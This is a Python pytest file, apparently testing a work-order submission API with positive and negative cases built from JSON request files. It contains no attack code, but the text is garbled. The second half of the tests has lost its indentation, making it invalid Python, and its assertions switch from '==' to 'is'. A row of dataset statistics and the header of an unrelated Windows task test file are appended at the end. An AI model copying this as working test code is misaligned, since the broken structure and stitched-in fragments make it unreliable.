            "work_order_submit_encryptedDataEncryptionKey_not_set_echoClient.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.positive
    def test_workordersubmit_encrypteddataencryptionkey_emptyechoclient(self):
        test_id = '18806'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_encryptedDataEncryptionKey_empty_echoClient.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.positive
    def test_workordersubmit_outdata_success(self):
        test_id = '18710'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_with_outdata.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_indata_bothindexremoveDataDatahash(self):
        test_id = '18714'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_remove_both_data_datahash_in_inData.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Missing in data parameter data")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_indata_oneValidOtherEmptDataDatahash(self):
        test_id = '18715'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_with_one_valid_and_other_empty_data_and_datahash_in_indata.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for data hash of in data")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_indata_singleindexremoveDataDatahash(self):
        test_id = '18716'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_remove_both_data_datahash_Single_index_in_inData.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Missing in data parameter data")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk_1
    @pytest.mark.negative
    def test_workordersubmit_indata_index2randomstr(self):
        test_id = '18719'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_indata_data_index2_random_str.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid Request")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk_1
    @pytest.mark.negative
    def test_workordersubmit_indata_index1randomstr(self):
        test_id = '18720'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_indata_data_index1_random_str.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid Request")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_workloadid_emptystring(self):
        test_id = '18722'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_workload_id_empty_string.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for work load id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_workloadid_hexstring(self):
        test_id = '18723'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_workload_id_hex_string.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Workload cannot be processed by this worker")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_workload_nullstring(self):
        test_id = '18726'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_workLoad_null_string.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Workload cannot be processed by this worker")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_workorderid_increasedhexlength(self):
        test_id = '18727'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_WorkOrder_increased_hexlength.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for work order id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_workorderidworkloadid_same(self):
        test_id = '18728'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_same_WorkOrderID_WorkloadId.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for work order id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.positive
    def test_workordersubmit_data_differentdataheartdisease(self):
        test_id = '18731'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_indata_index1_data_different_hexlength.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_requesterId_specialcharacter(self):
        test_id = '18734'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_requesterId_som_special_characters.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for requester id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_requesterNonce_param_empty(self):
        test_id = '18735'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_requesterNonce_param_empty.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Empty or Invalid data format for requesterNonce")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_requestersignature_differentlength(self):
        test_id = '18492'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_verify_requesterSignature_diff_length.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for requesterSignature")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_verifyingkey_nullstr(self):
        test_id = '18501'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_verifyingkey_null_str.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Crypto Error (deserializeECDSAPublicKey): "
                "Could not deserialize public ECDSA key")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.positive
    def test_workordersubmit_indataoutdata_success(self):
        test_id = '18703'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_indata_outdata.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_workorderId_remove(self):
        test_id = '18725'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_workorderId_remove.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for work order id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_sessionkeyiv_allspecial_characters(self):
        test_id = '18737'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_sessionkeyiv_allspecialchar.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for session key iv")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_requesterId_differenthexlength(self):
        test_id = '18742'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_requesterId_variouslengthhex.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid parameter requesterId")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_workerEncryptionKey_notdefaulthex(self):
        test_id = '18743'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_workerEncryptionKey_notdefaulthex.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid parameter workerEncryptionKey")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_sdk_workerEncryptionKey_notdefaulthex(self):
        with pytest.raises(
                ValueError,
                match="Encrypting Session key failed: "
                      "Invalid session key or worker encryption key"):
            test_id = '18743'
            request_file = os.path.join(
                env.work_order_input_file,
                "workordersubmit_workerEncryptionKey_notdefaulthex.json")
            err_cd = \
                self.test_obj.setup_and_build_request_wo_submit(
                    read_json(request_file))
            submit_response = submit_request(
                self.test_obj.uri_client,
                self.test_obj.build_request_output['request_obj'],
                env.wo_submit_output_json_file_name,
                read_json(request_file))
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.negative
    def test_workordersubmit_requesterNonce_notdefaultlength(self):
        test_id = '18745'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_requesterNonce_notdefaultlength.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid parameter requesterNonce")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.positive
    def test_workordersubmit_requesterSignature_no(self):
        test_id = '18613'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_encryptedRequestHash_norequesterSignature.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_encryptedRequestHash_no(self):
        test_id = '18777'
        request_file = os.path.join(
            env.work_order_input_file,
            "workordersubmit_requesterSignature_noencryptedRequestHash.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Missing parameter encryptedRequestHash")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

@pytest.mark.workordersubmit
@pytest.mark.negative
def test_workordersubmit_mandatoryfields_remove(self):
test_id = '18781'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_mandatoryfields_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_id_remove(self):
test_id = '18787'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_id_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Server error")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workeridworkloadid_same(self):
test_id = '18794'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workeridworkloadid_same.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"worker 0xABCD doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_firstinparams(self):
test_id = '18796'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_indata_firstinparams.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_unknownparameter(self):
test_id = '18700'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_unknownparameter.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid parameter unknownEncoding")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerId_notdefaultlength_postmsg(self):
test_id = '20365'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerId_notdefaultlength_postmsg.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"worker 6ba1f459476bc43b65fd554f6b65910a8f551e4bcb0eee6a96dcebaeb14f2ae923456234564567 doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workerId_notdefaultlength(self):
test_id = '18741'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_workerId_notdefaultlength.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"worker 6ba1f459476bc43b65fd554f6b65910a8f551e4bcb0eee6a96dcebaeb14f2ae923456234564567 doesn't exists")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_payloadFormat_notJSONRPC(self):
test_id = '18750'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_payloadFormat_notJSONRPC.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid payload format")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_empty(self):
test_id = '18762'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_empty.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Invalid parameter params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_OutDataDataEncryptionKey_hyphen(self):
test_id = '18784'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_OutDataDataEncryptionKey_hyphen.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_params_twiceechoclient(self):
test_id = '18791'
request_file = os.path.join(
env.work_order_input_file,
"workordersubmit_params_twiceechoclient.json")
msg_response = self.test_obj.post_json_msg(request_file)
assert (
check_negative_test_responses(
msg_response,
"Duplicate parameter params")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
| 35.032024 | 123 | 0.625113 | 10,275 | 91,889 | 5.208175 | 0.038248 | 0.07684 | 0.089827 | 0.061591 | 0.91378 | 0.913182 | 0.909986 | 0.908398 | 0.907501 | 0.905782 | 0 | 0.008774 | 0.290524 | 91,889 | 2,622 | 124 | 35.045385 | 0.812081 | 0.009207 | 0 | 0.875576 | 0 | 0 | 0.123049 | 0.045001 | 0 | 0 | 0.000066 | 0 | 0.035484 | 1 | 0.037788 | false | 0 | 0.003687 | 0 | 0.042396 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a00418b929de0feab807f49fe6519e8a041aa082 | 25,540 | py | Python | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 2 | 2019-05-26T03:10:17.000Z | 2019-06-15T10:18:59.000Z | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 12 | 2015-04-15T22:17:42.000Z | 2016-03-22T08:46:27.000Z | tests/unit/states/test_win_task.py | byteskeptical/salt | 637fe0b04f38b2274191b005d73b3c6707d7f400 | [
"Apache-2.0"
] | 4 | 2015-04-16T03:24:08.000Z | 2015-04-22T15:33:28.000Z | # -*- coding: utf-8 -*-
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383608(v=vs.85).aspx
